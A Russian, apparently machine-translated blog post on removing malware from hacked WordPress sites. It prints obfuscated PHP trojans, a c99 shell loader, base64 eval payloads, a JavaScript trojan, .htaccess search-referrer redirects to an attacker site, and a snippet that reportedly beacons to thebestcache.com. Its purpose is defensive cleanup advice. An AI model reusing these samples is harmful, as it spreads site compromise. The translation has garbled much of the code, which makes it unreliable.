Как исправить вредоносный сценарий в WordPress.
Полсе того как наш сервер взломали,все PHP файлы были заражены.В файлы PHP был введён вредоносный код malware, см. ниже,код вызывал ещё один PHP файл и он выполнял его программу.Для того,чтобы очистить файлы понадобилось удалить вредоносную программу и вредоносный код в каждом файле.Это действительно неприятно и муторно,если у вас есть сотни зараженных файлов так,что я сделал — я нашёл скрипт, который будет делать это автоматически.
Список вредоносных кодов,вредоносных скриптов, которые мне встретились до сих пор:
A. c99madshell — это тип вредоносных программ,скрипт имеет возможность просматривать ваши базы данных и получить доступ к вашим файлам, как админ. Ниже приведен пример кода:
<?php $md5 = "2b351068f6742153073f3af2e7fa11de"; $wp_salt = array (`6", " р",`)`,"f",`я`,`4`, z"",`_`,`(`,`e",";","ж","з", " b","a","$","в","д","т",`n`,`c`,"l","s"); $wp_add_filter = create_function (`$`.`v`,$wp_salt [9]$.wp_salt [16]$.wp_salt [14]$.wp_salt [21]$.wp_salt [8].$wp_salt [11]$.wp_salt [6].$wp_salt [4].$wp_salt [19]$.wp_salt [3].$wp_salt [21]$.wp_salt [14]$.wp_salt [18].$wp_salt [9]$.wp_salt [8].$wp_salt [13]$.wp_salt [14]$.wp_salt [22]$.wp_salt [9]$.wp_salt [0]$.wp_salt [5].$wp_salt [7]$.wp_salt [17]$.wp_salt [9]$.wp_salt [20]$.wp_salt [12]$.wp_salt [17]$.wp_salt [9]$.wp_salt [8].$wp_salt [15]$.wp_salt [16]$.wp_salt [2]$.wp_salt [2]$.wp_salt [2]$.wp_salt [10]); $wp_add_filter (`FZnHEqvGFkU/x3YxIKdyeUDOGZEmr8gZRA5f/3SH0gS6+/...`); ? > B. Trojan
<?php ... eval (base64_decode ("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJj...")); ... C. Trojan
<?php if (!function_exists (`b4xvpqj38lpm8ux`)) {функция b4xvpqj38lpm8ux ($Алми) {$ddhg=`mi=`;$obwyp2=`ba`;$tqmtyx=`$`;$dl8u6=`4`;$ufhk7=`;`;$fead2i=`l`;$jqml=`e`;$gndg=`c`;$c8px1=`al`;$fnidfi=`ода`;$u5vntk=`se6`;$uhoe=` ($`; $wucoiz=`_d`;$ebexu=`mi)`; eval ($tqmtyx.$fead2i.$ddhg.$obwyp2.$u5vntk.$dl8u6.$wucoiz.$jqml.$gndg.$fnidfi.$uhoe.$c8px1.$ebexu.$ufhk7); return $Алми;}$dn4b2l=`DTh0aDxGZzVodDE1Zzx4T19SQ1NfbEFKUnIrSjpxeGpqM2c1aHQxNTx4T19SQ1NfbEFKUnIrSjpxeDRuajt0MXRSWjVpPHhndFoySW0+UjVNTUtNWng0Tmo7NU1NS01STTUyS01pdDFkPE5qO2c1aHQxNTx4T19SU2JsOjBKUio6X0NsRzB4NHhNNWFLaTVSWndNdDJpUmFtd254ajtnNWh0MTU8eE9fUitDOlJTUFNEOlJDU19sQUp4NGlNLTVqO2c1aHQxNTx4T19SU1BTRDpSQ1NfbEFKUkpscjp4NFdOVldOVm5wajtnNWh0MTU8eE9fUitDOlJTUFNEOlJDOl8qOl9sQXg0aU0tNWo7ZzVodDE1PHhPX1JTUFNEOlJDOl8qOl9sQVJKbHI6eDRXTlZXTlZucGo7aC0xd2l0SzF8T19Scm1kdHdDaU10MlpJbVpmNVo8JG1NTWozdGg8dFpSbU1NbT48JG1NTWpqMyRtTU05bU1NbT5SYW0yPCdPX1JybWR0d0NpTXQyWkltWmY1Wic0JG1NTWo7QjVJWjUzJG1NTTlaaU10MlpJbVpmNVo8JG1NTWo7Qk01aS1NMXwkbU1NO0JoLTF3aXRLMXxPX1JsMXRpPGozZzV...`; eval (b4xvpqj38lpm8ux (`JGRuNGIybD1iNHh2cHFqMzhscG04dXgoJGRuNGIybCk7JGRuNGIybD1zdHJ0cigkZG40YjJsLCdnKzQhdk9WdS9OYnc5V0Ege0hCNUU4PmpJaHRxb01zeENUbllfYXBRKDwuMm1SNzFKUyJacktYaWZsKXkKOmV9RDN8UDY9Y0wway0qR3pGLFVkJywn...`));} D. Javascript Trojan <script>если (window.document) aa=[]+0; aaa=0+[]; если (aa.indexOf (aaa)===0) {ss="; try {новом месте (12);} catch (qqq) {...} ee=`e`; e=window.eval; t=`y`;} h=-4* : Math.tan (:Math.atan (0.5)); n="3.5a3.5a51.5a50a15a19a49a54...".split ("а"); for (i=0; я-n.length E. htaccess - код ниже перенаправляет посетителей на хакерский сайт (massage-pool.ru)
<IfModule mod_rewrite.c> Сылка На Подробное Описание RewriteCond% {HTTP_REFERER}^. *(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber- содержание|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv).(.*) RewriteRule ^ (.*) $ [R=301, L] RewriteCond% {HTTP_REFERER}^. *(web|websuche|witch|wolong|oekoportal|t -онлайн|freenet|компания ARCor|alexana|tiscali|kataweb|оранжевый|вуаля|sfr|startpagina|kpnvandaag|Ильза|wanadoo|telfort|hispavista|passagen|спрей|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|даффодил|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|поиск|simplyhired|splut|arena|thisisouryear|ukkey|уве||friendsreunitedДжаан|qp|rtl|search-Бельгия|apollo7|bricabrac|findloo|kobala|limier|Экспресс|bestireland|browseireland|finditireland|iesearch|Ирландии -информация|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|Савио|соль|startsiden|allpages|Америка|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline).(.*) RewriteRule ^ (.*) $ [R=301, L] </IfModule> ErrorDocument 400 ErrorDocument 401 ErrorDocument 403 ErrorDocument 404 ErrorDocument 500
F. Timthumb Уязвимости
Этот скрипт использует в основном обрезку и изменения размера изображений,он используется в большинстве WP Премиумам темах,но хакеры смогли найти уязвимость этого сценария и были в состоянии сделать то, что они хотят,к сожалению,с помощью этого скрипта,они могут получить доступ к вашей базе данных,чтобы получить важную информацию,вставить вредоносный код во все ваши php файлы,и даже создать другой вредоносный скрипт на php,который может сделать гораздо больше. Любой timthumb.php или thumb.php файл, который находится ниже версии 1.35 уязвим,я советую,обновить файл до версии 2.0 и выше.
Решение: Обновить ваш файл можно здесь: http://timthumb.googlecode.com/svn/trunk/timthumb.php
Г. class-wheel.php
Насколько я смог расшифровать файл,скрипт посылает важную информацию сервера для thebestcache.com и тогда скрипт получает данные из этого сервера,и затем выполняет его.Я думаю,что с этим сценарием хакер может делать всё,что он хочет сделать,чтобы ваш сервер как на timthumb,мог сделать запись RewriteRule в ваш htaccess, чтобы перенаправить пользователя на его хакерский сайт,вставьте вредоносных iframes, вставьте вредоносных javascript, и многое другое.
Решение: Удалить этот файл сразу
Ниже приведен фрагмент кода скрипта
< ? $GLOBALS [`_1739858145_`]=Array (`e`. `rror`.`_` . `r`.`, опасностей`,". `в`. `i_`. `se`. `t`,`в`. `i_set`,"`. soc`. `k`. `et_`. `get`. `peerna`. `m`. `e`,`s`. `trto`. `k`,`strpbrk`,`session_`. `я`. `s_reg`. `I`. `град`, `preg_replace`,`има`. `gecre`. `на`. `efro`. `мг`. `я`. `f`,`ar`. `ray_pop`,`implode`,`preg_mat`. `ch`,`я`. `m`. `pl`. `ода`,`preg_ma`. `t`. `ch`,`г`. `ripos`,`в`. `o`. `ck`, `array_f`. `губы`,`mt_rand`,`p`. `reg_`. `соответствует`,`p`. `reg_mat`. `ch`,`im`. `pl`. `o`. `de`,`p`. `reg_`. `m`. `a`. `АС`,". `b`. `как`. `e64_encode`,`сер`. `ialize`,`fi`.`l`. `e`.`_get`.`_c`.`ontents`,`b`. `ase64_d`. `ecode`,`preg_m`. `да`,". `pre`. `g_rep`. `la`. `ce`,"`. preg_replace`,`u`.`"`. `ri`. `alize`,`base64`.`_d`. `e` ... H. god_mode_on
<? php /*f2c315e178b39d12fa925987425e4e25_on*/ $Py0IAoRh= array(`10100`,`10117`,`10096`,`10107`);$VMteSwXRc7lP= array(`4892`,`4907`,`4894`,`4890`,`4909`,`4894`,`4888`,`4895`,`4910`,`4903`,`4892`,`4909`,`4898`,`4904`,`4903`);$xvak07gN5kcVT= array(`6294`,`6293`,`6311`,`6297`,`6250`,`6248`,`6291`,`6296`,`6297`,`6295`,`6307`,`6296`,`6297`);$YMBF7WGci7Z07sbiK1DbxiRKDEF4gdT8PkEN6aPf8F66X="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTm..."; if (!function_exists ("TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5")) {функция TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5 ($MxwA7W2O5hdqavGiLlWRsjFStqs84USMiedg16,$bdXddjKlUV8Cdh7WBoeziZiV7nZeeVY1YL51UFdFr) {$Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg="; foreach ($MxwA7W2O5hdqavGiLlWRsjFStqs84USMiedg16 как $QyrfMMuvbewBXSaCkksZvBGOPmuX5ALH) {$Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg. = chr ($QyrfMMuvbewBXSaCkksZvBGOPmuX5ALH - $bdXddjKlUV8Cdh7WBoeziZiV7nZeeVY1YL51UFdFr);} return $Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg;}$zs4ALsgC4dMC1kTLd = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5 ($Py0IAoRh, 9999);$G2dp21boYT5TLmcF = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5 ($VMteSwXRc7lP, 4793);$JYTgSWSlO34p7zE0CUStV6iE22ff5LSJAB = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5 ($xvak07gN5kcVT, 6196);$eozu2spipON = $G2dp21boYT5TLmcF (`$MxYAjVJONC`,$zs4ALsgC4dMC1kTLd.`(`$.JYTgSWSlO34p7zE0CUStV6iE22ff5LSJAB.`($MxYAjVJONC));`);$eozu2spipON ($YMBF7WGci7Z07sbiK1DbxiRKDEF4gdT8PkEN6aPf8F66X);} /*f2c315e178b39d12fa925987425e4e25_off*/? >
I. Trojan
<? php @error_reporting (0); if (!isset ($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1Uj...";$eva1tYlbakBcVSir = "x65144x6f154x70170x65";$eva1tYldakBcVSir = "x73164X72 с162x65166";$eva1tYldakBoVS1r = "x65143x61154x70145X72 с137x67145X72 с160";$eva1tYidokBoVSjr = "x3b51x29135x31\133X72 с152x53126x63102x6b141x64151x59164x31141xp76145x2450x65144x6f143x65144x5f64x36145x73141x6250x6c141xp76145x4072x65166x61154x2842x5c61x2251x3b\72x4050x2e53x29100x69145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir ($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir ($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr (chr (2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr [0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr (chr (3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr ($eva1tYidokBcVSjr [0.016*(7812.5*0.016)],$eva1tYidokBcVSjr [62.5*0.016],$eva1tYldakBcVSir ($eva1tYidokBcVSjr [0.061*0.031]));$eva1tYldakBcVSir="";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "x73164X72 сx65143X72 с160164X72 с";$eva1tYlbakBcVSir = "x67141x6f133x70170x65";$eva1tYldakBoVS1r = "x65143X72 с160";$eva1tYldakBcVSir=""; $eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;}? >
Большинство этих нападений происходит,когда у вас установлена старая версия ваших программ — WordPress,Joomla,Timthumb,WP Плагины, простой ftp или sftp пароль,а также зараженный компьютер,и хакер может использовать ваш ftp.Убедитесь, что у вас обновлены все версии программ.
Скачайте и установите
Скачайте скрипт и положите его в ваш корневой каталог или любую директорию. Эта программа будет проверять все PHP-файлы и очистит их,если они инфицированы кодом описанным выше.
Вредоносного кода продолжает двигаться назад
Если вы удалите вредоносный код,вредоносный скрипт успешно,но если он по-прежнему продолжает возвращаться.Я предлагаю вам, чтобы запустить сканер вредоносных программ: сканер вредоносных программ.